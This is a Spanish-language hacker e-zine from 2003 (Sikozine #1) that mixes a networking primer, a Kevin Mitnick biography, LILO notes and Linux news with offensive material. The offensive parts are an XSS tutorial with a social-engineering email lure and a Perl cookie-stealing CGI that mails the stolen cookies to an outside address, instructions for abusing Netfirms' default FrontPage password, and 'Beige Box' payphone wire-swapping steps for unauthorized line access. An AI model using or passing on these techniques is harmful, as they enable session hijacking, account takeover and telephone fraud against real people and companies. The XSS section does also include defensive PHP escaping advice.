11111000011100110101100011001100001110

<< SIKOZINE #1 | AÑO 1 >>

111100011100111000111000011100111110

 

8/02/03

www.skteam.com.ar

entrega quincenal


I N T R O

Por fin salio a la luz la Sikozine... Vamos a ser cortos. Este era nuestro ultimo proyecto pensado y preparado. Espero que les interesen los temas que estan aqui. skteam

 


INTRODUCCION A TIPOS DE REDES (BASICO) VOL #1

 

Bueno gente vamos a tratar de explicar que es esto de las redes para los menos entendidos en el tema, ok, LET START...
La idea de interconectar computadores comenzo con la necesidad de reducir los insumos y las maquinarias de las empresas y la incomodidad de los operarios ya que por ejemplo para imprimir algo se tenia que bajar a discos, ir fisicamente a la maquina que tenia la impresora y asi imprimirlo gastando mas tiempo del que es necesario ya que si en ese momento la impresora esta en uso no se podia continuar.
Asi se crearon las primeras redes, pero seguian siendo deficientes ya que cada red tenia sus red y sus protocolos haciendo que fuera imposible conectar dos redes o incluso cambiar partes de la misma red; asi fue como se crearon los modelos de referencia (OSI entre los mas conosidos creado en los 80 por iso) hechos para normalizar y compatibilizar estos componentes pero eso es un tema que tocaremos en otro momento.
Como se imaginaran las redes se pueden dividir en muchas categorias, hoy veremos dos de ellas, quizas las mas importantes o genericas, la primera por zona geografica, y la segunda por "tipo de transmicion"...

1) Zona geografica (en escala decresiente)


*Microcomputadoras (toda coputadora puede verse como una red, ya que posee canales de comunicacion, reseptores y transmisores dentro de ella)

*Lan (Local Area Network... se considera red lan al conjunto de computadoras que se encuentren interconectadas con cualquier dispositivo hasta una distancia de 1km. Las velocidades mas comunes en este tipo de redes es de 10/100 mbps)

*Man (Metropolitan Area Network... son identicas a las LAN solo su rango de distancia es mayor, los 10km, por lo general esta conformada por un conjunto de LANs enterconectadas)

*Wan (WIde Area Network... son las redes mas extensas, incluso se puede tomar a internet como una red WAN, y estan conformadas por grupos de las anteriores)


2)Tipo de transmicion (Para diferenciarlos usaremos 2)

* Broadcast (Es un solo canal de comunicacion que conecta a todas las computadoras, por ende un paquete que mande una maquina le llegara a todas las que esten conectadas a la red)

* Point-To-Point (PTP) (Es lo mas comun en estos dias, los paquetes enviados viajan por la red por distias computadoras por medio de un ruteo previo, esto significa que un paquete mandado de un ordenador A a uno B no sera inviado a todas sino que sera mandado por la direccion mas corta posible, por esto se dice que es una red de conexion entre multiples pares de maquinas.



Bueno espero que esto les sirva de algo, en proximos informes iremos puliendo mas cada una de estos datos. Hasta Pronto.

Binary Overwrite

 

MITNICK, COME BACK!

 

A sus 39 años de edad, Kevin Mitnick, el hacker más famoso de todos los tiempos, volvio a estar online el 20 de Enero.
Tras ser detenido en 1995 por el FBI, que lo acusaba de introducirse en los sistemas informáticos de empresas como Motorola Inc., Novell Inc., Nokia Corp. y Sun Microsystems fue condenado a 46 meses de prisión.
No obstante en enero del 2000 salió en libertad condicional, aunque el juez le prohibió usar equipos informáticos durante 3 años.


El plazo expiró el 20 de enero, y Kevin volvio a tocar un ordenador de nuevo. La Historia del Chacal de la Red
Como Hacker, la carrera de Kevin Mitnick comenzo a los 16 años, cuando obsesionado por las redes de computadoras rompio la seguridad del sistema administrativo de su colegio, pero no para alterar sus notas, lo hizo "solo para mirar".
Su bautizo como infractor de la ley fué en 1981, cuando junto a dos amigos entro físicamente en las oficinas de COSMOS de Pacific Bell. COSMOS (Computer System for Mainframe Operations), disponía de una gigantesca base de datos empleada por la mayor parte de las compañías telefonicas norteamericanas y que servía para controlar el registro de llamadas.


Una vez dentro de las oficinas obtuvieron la lista de claves de seguridad, la combinacion de las puertas de acceso de varias sucursales y manuales del sistema COSMOS. La informacion robada tenía un valor equivalente a los 200.000 dólares.
La novia de uno de ellos los delató, aunque y debido la su minoria de edad de Mitnick la Corte Juvenil lo sentencio a tres meses de carcel y a un año bajo libertad condicional.


Tras haber cumplido la condena el oficial custodio encargado de su caso encontró que su teléfono había sido desconectado y que la compañia telefónica no disponía de registro de él.
Sus objetivos iban creciendo, y en 1982 entró ilegalmente, via modem, a la computadora del North American Air Defense Command en Colorado, aunque antes alteró el programa encargado de rastrear la procedencia de las llamadas, trucando la procedencia de la suya.


Un año mas tarde, cuando estudiaba en la Universidad del Sur de California, fue arrestado de nuevo por entrar ilegalmente en ARPAnet (la predecesora de Internet), e intentar entrar en los ordenadores del Pentágono. Esta vez fué sentenciado a seis meses de carcel en una prision juvenil de California.
En 1987 volvió a ser acusado, en Santa Cruz California, de invadir el sistema de la compañia Microcorp Systems. Le cayeron tres años de libertad condicional, tras la cual su expediente desaparecio misteriosamente de los ordenadores de la policía local.


Posteriormente solicita trabajo en el Security Pacific Bank como encargado de la seguridad de la red del banco, el tras ser rechazado por sus antecedentes penales, Mitnick procede a falsificar un balance general del banco donde aparecían perdidas por valor de 400 millones de dolares.
Ese mismo año comienza el escandalo que lo lanzo definitivamente a la fama. Durante meses observó en secreto el correo electronico de los miembros del departamento de seguridad de MCI Communications y Digital Equipment Corporation. Descubriendo el sistema de protección del sistema telefonico de ambas compañias.
Tras recoger suficiente informacion se apodera de varios codigos de seguridad de MCI y junto su amigo, Lenny DiCicco, asalta la red del laboratorio de investigaciones de Digital Corporation, conocida como Easynet.
La intención de los hackers era obtener una copia de la versión beta del nuevo sistema operativo de Digital "VMS". No obstante el personal de seguridad de Digital se dio cuenta del ataque y alertaron al FBI, el cual comienza a rastrear a los hackers.


Mitnick fue un mal complice, ya que intentó cargar el muerto a DiCicco, mediante llamadas anónimas al jefe de la empresa de software en la que trabajaba este.
DiCicco, frustrado y lleno de rabia, confiesa la verdad ante el FBI, el cual procede a arrestar a Mitnick en 1988, Digital Equipment le acusa de haberle ocasionado daños cuantificados en 4 millones de dolares.
Mitnick fué declarado culpable de los cargos de fraude con computadoras y de posesion ilegal de codigos de acceso.


Adicionalmente el fiscal consiguió una orden que prohibia a Mitnick el uso del telefono en prision alegando que a través de ellas podria tener acceso a todo tipo de ordenadores.
El juez únicamente lo autorizó a realizar llamadas a su abogado, a su esposa, a su madre y a su abuela y siempre bajo la supervisión de un oficial de la prision.
Gracias a que el abogado de Mitnick logró convencer al juez de que este sufria adiccion a las computadoras, la sentencia fué de tan solo un año de prisión, tras el cual debería seguir un programa de rehabilitación de 6 meses.
Tras el año de prisión y durante el tratamiento Mitnick logró no tocar un ordenador y perder hasta 45 kilos de peso.


Ya en 1991, tras haber ocupado la primera plana del New York Times, uno de sus reporteros, John Markoff, decide escribir un libro en el que narraba las correrías informáticas de Mitnick.
El libro no resulta del agrado de Mitnick, que procede a hackear la cuenta de correo electrónico de Markoff.
En 1992, Mitnick comienza a trabajar para una agencia de detectives, que pronto descubre que está usando fraudulentamente su base de datos.
El FBI vuelve a intervenir, registrando su casa sin conseguir dar con el. Mitnick se había convertido en un Hacker profugo.


El Departamento de Vehiculos de California ofrece una recompensa de un millon de dolares a todo aquel que ayudara al arresto de Mitnick, al que acusaban de haber tratado de obtener una licencia de conducir de manera fraudulenta, empleando falsos codigos de acceso.
Mitnick decide enfrentarse con los ordenadores de Tsutomu Shimomura, un físico experto en sistemas de seguridad que estaba encargado del "San Diego Computer Center".
Shimomura descubre a Mitnick invadiendo sus sistemas, lo que hace que se plantee como un reto personal atrapar al popular hacker.


A finales de enero de 1995, un programa diseñado por Shimomura es localizado en una cuenta en "The Well", un proveedor de Internet en California. Mitnick habia creado una cuenta fantasma en dicho proveedor desde la que estaba utilizando las herramientas de Shimomura para atacar una docena de corporaciones, entre las que se encontraban Motorola, Apple y Qualcomm.


Tras reunirse Shimomura con el gerente de "The Well" y con un tecnico de Sprint (proveedor de servicios telefonicos celulares) descubre que Mitnick había creado un numero celular fantasma para acceder al sistema.
Tras dos semanas de rastreo consiguen determinar que las llamadas provenian de Raleigh, California.
Shimomura se traslada a Raleigh, donde recibe una llamada de un experto en seguridad de InterNex, otro proveedor de Internet en California, alertándole de que Mitnick habia invadido el sistema de InterNex.
Por otro lado Shimomura disponía de informacion sobre la invasion de Mitcnick a Netcom, una red de base de datos de noticias. Shimomura se comunica con el FBI, el cual envía a un grupo de rastreo por radio, capaz de rastrear las llamadas de Mitnick.


El arresto se produce el día 16 de Febrero, en el apartamento de Mitnick, que abrió con toda calma al FBI.
De regreso a su hotel y al comprobar Shimomura su contestador telefónico descubre varios mensajes burlescos de Mitnick en tono oriental, el último de los cuales habia sido recibido ocho horas despues de que Mitnick hubiera sido arrestado.
El como se realizo esa llamada aun es un misterio.

 

ERROR EN NETFIRMS

 

Introduccion
------------
Este brevisimo paper trata de explicar una equivocacion en el formulario de registracion de Netfirms Company (www.netfirms.com)

Problema
--------
Si una empresa de hosting quiere brindarle a la gente mayor confianza, no pueden hacer la barbaridad que hicieron.
Cuando terminas de registrarte automaticamente te habilitan las extensiones de front page con un pass "default" y lamentablemente ese respectivo pass seria el email al registrarse.
Entonces tendriamos 2 pass : a] pass al registrar + b] pass default (email)

Solucion
--------
No queda otra que cambiar el pass de las extensiones de Front Page


Pass "Default"
--------------
En Netfirms toman como password "Default" el mail al registrar. Otras empresas toman como default el nombre a registrar, nombre del dominio o pass original.

"Exploit"
---------
Ja!... esto no es una falla sino una huevada de la empresa que puede tener grandes problemas, la explicacion es clara... si quieren aprovechar este ERROR, tienen que saber el mail al registrar de la victima, modifican con Front Page, se logean y listo.

AVISO
-----
Es preferible avisarle a cada webmaster de este error y no defacearlo por mas huevon que sea ya que ellos no tienen la culpa sino los admin de Netfirms, por lo menos asi lo veo yo ;) thx nomoke.

MuRdoc

 


EXPLOTANDO XSS

 

Introducción
°°°°°°°°°°°°
Este texto busca explicar la falla XSS (o CSS o Cross Site Scripting), en qué consiste y como puede ser usada, a fin de comprender el método de protección, ya que la misma es mucho más eficaz si se comprende el método de ataque.

Comprensión
°°°°°°°°°°°°
El XSS consiste en la inyección (o ejecución), de scripts que permitan el acceso a datos contenidos en otro servidor.
La ejecución se hace por parte del cliente y por la del servidor.

Se necesita la Ingeniería Social para poder acceder a este tipo de atacas, debido a le hecho de que es generalmente a través de una URL que el XSS se lleva a cabo. 

Un ejemplo concreto...

Imaginemos una pagina PHP que permita mostrar articulos. Una parte del código PHP podría ser: 

----------------

<?
[...]
echo "<u>Title : </u><br><br>$title";
[...]
?>

----------------


Para mostrar el título del artículo.
Si la variable $title no está definida con anterioridad en el script, un url podría mostrar un titulo definido. por ejemplo:

http://[website]/articles.php?title=14000%20nouveaux%20cas%20de%20sida%20par%20jour.&id=58

En la página HTML devuelta por el servidor apache aparecerá:

-----------------------------------------------------------------------

<u>Titre : </u><br><br>14000 nouveaux cas de sida par jour.

-----------------------------------------------------------------------

Para hacer que el script se ejecute en la página el atacante debería tipear las dirección del tipo:

http://[website]/articles.php?title=[SCRIPT]&id=58

o
http://[website]/articles.php?title=4000%20nouveaux%20cas%20de%20sida%20par%20jour.[SCRIPT]&id=58

[SCRIPT] siendo un ejemplo no nocivo por, ejemplo:

-------------------------------------------

<script>alert('Hello World')</script>

-------------------------------------------

en el código HTML sería:

------------------------------------------------------------------------------

<u>Titre : </u><br><br><script>alert('Hello World')</script>

------------------------------------------------------------------------------

o

------------------------------------------------------------------------------------------------

<u>Titre : </u><br><br>14000 nouveaux cas de sida par jour.<script>alert('Hello World')</script>

------------------------------------------------------------------------------------------------

Si por ejemplo tenemos en el indice el código :

--------------------------------

<?

include("files/".$page.".php");

?>

--------------------------------

Y que un atacante ingresa el URL:
http://[website]/index.php?page=[NOEXISTE]

Se vería un error del estilo siguiente:

-------------------------------------------------------------------------------------------------------------

Warning: Failed opening 'files/[NOEXISTE].php' for inclusion (include_path='') in /home/www/index.php on line 1

-------------------------------------------------------------------------------------------------------------

Si ahora la URL que ingresamos es http://[website]/index.php?page=[SCRIPT], en la página se mostrara la linea siguiente :

-------------------------------------------------------------------------------------------------------------

Warning: Failed opening 'files/[SCRIPT].php' for inclusion (include_path='') in /home/www/index.php on line 1

-------------------------------------------------------------------------------------------------------------


Un ejemplo de ingeniería social sería enviarle a WebMaster un mail con el contenido siguiente :

------------------------------------------------------------------------------------------------------------

Hola, 
Hay un problema en su sitio http://[website]/.
No se bien pero la URL es:
<a href="http://[website]/articles.php?title=4000%20nouveaux%20cas%20de%20sida%20par%20jour.[SCRIPT]&id=58">
http://[website]/articles.php?title=14000%20nouveaux%20cas%20de%20sida%20par%20jour.&id=58
</a>
Bonne chance !
Bob

------------------------------------------------------------------------------------------------------------

EL Webmaster pensando que es un visitante sincero, hará un click en la URL del sitio, sin tener en cuenta el riesgo que esto implica. Y de esta manera ejecutara el script que deseemos.

Hubiera habido menos chances con un link del tipo:

------------------------------------------------------------------------------------------

<a href="javascript:[SCRIPT]">
http://[website]/articles.php?title=14000%20nouveaux%20cas%20de%20sida%20par%20jour.&id=58
</a>

------------------------------------------------------------------------------------------

el XXS permanente es más peligroso porque el script está SIEMPRE en el sitio y será ejecutado por varios visitantes.

El principio es el mismo, el script se puede encontrar en el GuestBook de un foro o en un HTML.......

Consecuencias del Cross Site Scripting :
- Recuperación de informaciones como la cookie o el URL
- Redirección hacia un URL, nociva o no.
- Recuperación de archivos que se encuentren en el disco de la victima.


Y eventualmente (según el OS y/o el navegador) :
- Bajar un archivo.
- Ejecución de un programa.
- Ejecución de un comando del sistema.
- ...

Esta provado entonces que el XSS no se puede subestimar.

Medidas de seguridad a tomar
°°°°°°°°°°°°°°°°°°°°°°°°°°°°

Las 2 funciones principales tocadas por el XSS en PHP son las funciones echo y print ().

Es aconsejable entonces, en lugar de poner:

------------------

<?
print($variable);
?>

------------------

o

------------------

<?
echo $variable;
?>

------------------

a cada vez ingresar :

-----------------------------------

<?
print(htmlspecialchars($variable));
?>

-----------------------------------

o

-----------------------------------

<?
echo htmlspecialchars($variable);
?>

-----------------------------------

Para asugrar XSS proveniente de eroores podriamos pensar por ejemplo:

--------------------------------

@include("files/".$page.".php");

--------------------------------

en lugar de

-------------------------------

include("files/".$page.".php");

-------------------------------

pero tomaría mucho tiempo.
Lo mejor es poner en el principio de la pagina:

-------------------

error_reporting(0);

-------------------

Lo cual detendrá cualquier muestra de texto en caso de error.

EXPLOIT

#!/usr/bin/perl
# robo.cgi

# depende del server
$mailprog = '/usr/sbin/sendmail';

# crea el log
open(COOKIES,">>stolen_cookie_file");

# html que vera la victima
print "Content-type:text/html\n\n";
print <<EndOfHTML;
<html><head><title>Robada</title></head>
<body>
cookie choreada
</body></html>
EndOfHTML

print COOKIES "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";

# mailea el log

open{MAIL,"|$mailprog -t"};
print MAIL "To: mail\@algo.com\n";
print MAIL "From: mail\@algo\n";
print MAIL "Subject: Afano De Cookie\n\n";
print MAIL "-" x 75 . "\n\n";
print MAIL "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
close (MAIL);

[De Verstand para la Sikozine :)]

 


BEIGE BOX [ARG]

 

1- Introduccion

Todos pensaban que no servia ninguna box en Argentina, pero hay excepciones, la BEIGE BOX es en mi opinion, la box mas violenta que existe hasta ahora. A continuacion veremos porque es así.

2- Que es la Beige Box?

La caracteristica de ésta box es la elaboración de un micrófono como el empleado por operarios de línea.

3- Como acceder?

Utilizaremos esta box en telefonos semipublicos. Primero hay que abrir la caja que esta debajo del fono, al hacer ésto van a ver en la parte superior 4 filas de cable, dichos cables se tienen que sacar e intercambiarlos. A continuacion veremos el dibujo:

CABLES 
|-------| <--- Linea 1
|-------| <--- Linea 2
|-------| <--- Linea 3
|-------| <--- Linea 4

INTECAMBIO

El primero con el ultimo
El segundo con el tercero
El tercero con el segundo
El cuarto con el primero

Al hacer esto nos dará tono pensando que somos los operarios de lineas. (Fue probado y funciona)

AVISO: HACER ESTO DE NOCHE!!!

VeNoM

 


OPCIONES DEL LILO

 

Este es el famoso archivo /etc/lilo.conf, no puede faltar para el arranque del LInux LOader (el cargador del linux)

Pasemos a ver las explicaciones....

 

prompt        >>Indica al lilo que deje al usuario seleccionar que sistema arrancar
verbose=5     >>Modo detallado (el 1 es el detalle minimo y el 5 es el nivel de detalle maximo)
timeout="50"  >>Indica cuanto tiempo da al usuario para elejir un sistema antes de que arranque en el sistema por default (se mide en decisegundos)


default=linux     >> El sistema por defecto para arrancar
boot="/dev/hdg"   >> Indica el device (disco rigido en este caso) donde se encuentra la imagen para bootear


map=/boot/map         >> El directorio del "mapa"
install=/boot/boot.b  >> Otra imagen de booteo, donde se encuentra el boot-sector.
message=/boot/message >> El mensaje que se muestra al arranque del lilo
lba32                 >> Esta opcion permite que el lilo se aloje mas alla de los 1024 cilindros (no es necesario alojarlo en el Master Boot Record)


vga="791"    >> Indica el modo de video que se va a arrancar, en este caso 1024x768, 16 bbp (ver todos los modos mas abajo)

image="/boot/vmlinuz-2.4.7-10.new" >>El directorio de la imagen para bootear
label="linux"                      >>El nombre que aparecera en la pantalla
initrd="/boot/initrd-2.4.7-10.img" >>El directorio de la imagen del init
read-only                          >>Solo lectura, pero no le den bola por que no hace nada realmente


root="/dev/hdg2"    >>Indica la particion donde se tiene que montar el root
append="ata100.i"   >>Append sirve para pasar comandos adicionales al LILO, generalmente esto solo se precisa para maquinas viejas o porque el LILO que no detectan bien los discos

other=/dev/hdg1    >>Otro sistema para arrancar
optional           >>Opcional :)
label=DOS          >>Nombre que aparecera en pantalla



Zipper

 


Noticias sobre Unix

Salio FreeBSD 5 RELEASE

Ya la pueden bajar de linuxiso.org.Aca esta la lista de las novedades:

  • UFS2, la segunda generacion del sistema de arcivos UFS.

  • Chequeo en segundo plano del sistema de archivos

  • Soporte experimental para "Mandatory Access Controls", provee una extensa y flexible utilidad para admins para definir politicas de seguridad para el sistema.

  • Soporte para Bluetooth, ACPI, CardBus, IEEE 1394 y aceleracion experimental para criptografia por hardware. Esto mantiene a FreeBSD actualizado con la tecnologia mas nueva.

  • GCC 3.2.1

  • GEOM, el extenso y flexible "framework" de almacenamiento, DEVFS, el dispositivo de sistema de archivos virtual, simplifica el almacenamiento y administracion de dispositivos mientras abre la puerta para nuevas tecnologias de almacenamiento empresarial.

  • Soporte para plataformas sparc64 y ia64.Expande el soporte de FreeBSD para plataformas avanzadas de 64-bit.

Si quieren saber mas aca hay algunas notas para profundisar en el tema...

 

MandrakeSoft se vino abajo

La semana pasada MandrakeSoft se declaró en cesación de pagos para sus deudas contraídas.Legalmente,esto equivale también a una reorganización financiera que le permita a la empresa renegociar sus deudas con sus acreedores, mientras continúa con sus operaciones normales, que incluyen el lanzamiento de Linux-Mandrake 9.1 para Abril. Sin embargo, para algunos esto ya es el preludio de la bancarrota...

Después de este último gran tropezón financiero, esta interesante entreda en el blog de un usuario considera seriamente los beneficios la posibilidad de convertir a Linux-Mandrake en una distribución soportada por una organización sin fines de lucro apoyada por sus propios usuarios, de una manera muy similar a cómo es Debian GNU/Linux.

----------------
Fuente: Vivalinux
----------------
MandrakeSoft nesecita 4 millones de EUROS para seguir operando. Nesecitan esto porque en el 2000 decidieron transformar la compania a una "e-learning/e-support" cuyos productos no sean basados en Linux. Asi incrementaron las gastos operativos en un 400%.

Esperemos que Mandrake remonte vuelo...

                 

Linux ingresa al sistema educativo universitario de Argentina

En Marzo del 2003 comenzará el primer ciclo lectivo de una carrera Linux muy particular: está estructurada en cuatrimestres y materias, al igual que las carreras universitarias. Con materias como Manejo de Terminales, Seguridad I y II, Programación I y II y Metodologias para el desarrollo y la distribución del Software la gente de Tuxsys (uno de los centros de capacitación en sistemas Linux más importante de Argentina) intentará brindar al público una manera sumamente sencilla y estructurada de "aprenderlo todo" en solo 8 meses (dos cuatrimestres). El título que brindan es el de "Administrador Avanzado de Sistemas Linux" y para obtenerlo es necesario rendir una serie de examenes al final de la carrera."
-----------------
Fuente:VivaLinux
----------------

es una exelente noticia, pienso que va a llevar a que cada vez haya mas expertos y que los argentinos informaticos (admins,hackers,programadores,etc) sean mas conocidos internacionalmente gracias a estas carreras de Linux.
Es un exelente incentivo para que cada vez mas gente se interese en el tema.

                    

Trustation llega a la Argentina !!!

Trustation Argentina (www.trustation.com) es el distribuidor en Argentina, Uruguay y Paraguay de TRUSTIX AS, empresa lider a nivel mundial de soluciones e-business y seguridad basada sobre TSL (Trustix Secure Linux), considerado el Linux mas seguro del mundo. La solucion e-business de Trustix esta compuesta por 5 modulos, firewall con VPN server, mail server, proxy server, lan server y web server. Todas las herramientas se administran desde un unico punto y a traves de una consola grafica intuitiva (GUI) que corre tanto bajo windows como linux, desde esta consola tambien puede administrarse cualquier otro Linux.

Fuente: VivaLinux

                       

La "Linux Box" mas poderosa del mundo

En la ultima LinuxWorld SGI debuto su nuevo sistema basado en Linux, SGI Altix 3000, con 64 procesadores de 64 bit (basados en el Intel Itanium 2), 512GB de memoria.Este sistema marca la apertura de una nueva frontera en la investigacion cientifica y los problemas a la demanda de "HPC"(High Performance Computing, o Computadoras de Alto Rendimiento), que pueden ser aplicados en Linux en diferentes maneras que antes no eran posibles. El entorno de HPC continua empujando los limites del sistema operativo, demandando un enorme numero de CPUs y mayor ancho de banda de I/O (entrada/salida). Este sistema esta basado en SGI NUMAflex global shared-memory architecture (acceso no-uniforme)

Temprano, cuando esta super computadora estaba en desarrollo, SGI tomo la decision de usar exclusivamente Linux como sistema operativo para esta nueva plataforma.

Una futura version de este sistema promete ofrecer 512 procesadores y 4 TB de memoria (!!).

Aca vemos las comparaciones (sistema de archivos, el sistema de acceso a discos y la CPU) de la supercomputadora con computadoras convencionales:

 

---------------------------------------------------------

Fragmento obtenido de Linux Journal (traducido y editado)

---------------------------------------------------------

VARIAS

- Salio KDE 3.1 !!!! se dice que es mas rapida que KDE 3 ... |

- Linux reemplazara al AIX, el sistema de IBM basado en unix.Esto se debe a que en el 2002 IBM tuvo ganancias por U$S 1.5 Billones en concepto de productos y servicios relacionados con Linux...|

- Intel promete 10 ghz para el año 2005|

 

 


END

                ,        ,           
               /(        )`          
               \ \___   / |          
               /- _  `-/  '          
              (/\/ \ \   /\          
              / /   | `    \         
              O O   ) /    |         
              `-^--'`<     '         
             (_.)  _  )   /          
              `.___/`    /           
                `-----' /            
   <----.     __ / __   \            
   <----|====O)))==) \) /====        
   <----'    `--' `.__,' \           
                |        |           
                 \       /           
            ______( (_  / \______    
          ,'  ,-----'   |        \   
          `--{__________)        \/

SIKOZINE N ° 2

coming soon

FRASE DEL DIA: "LINUX ES ABURRIDO, CON WINDOWS NUNCA SABES CUANDO SE VA A COLGAR"


>> Sikozine :: Copyright by Sikozys Team <<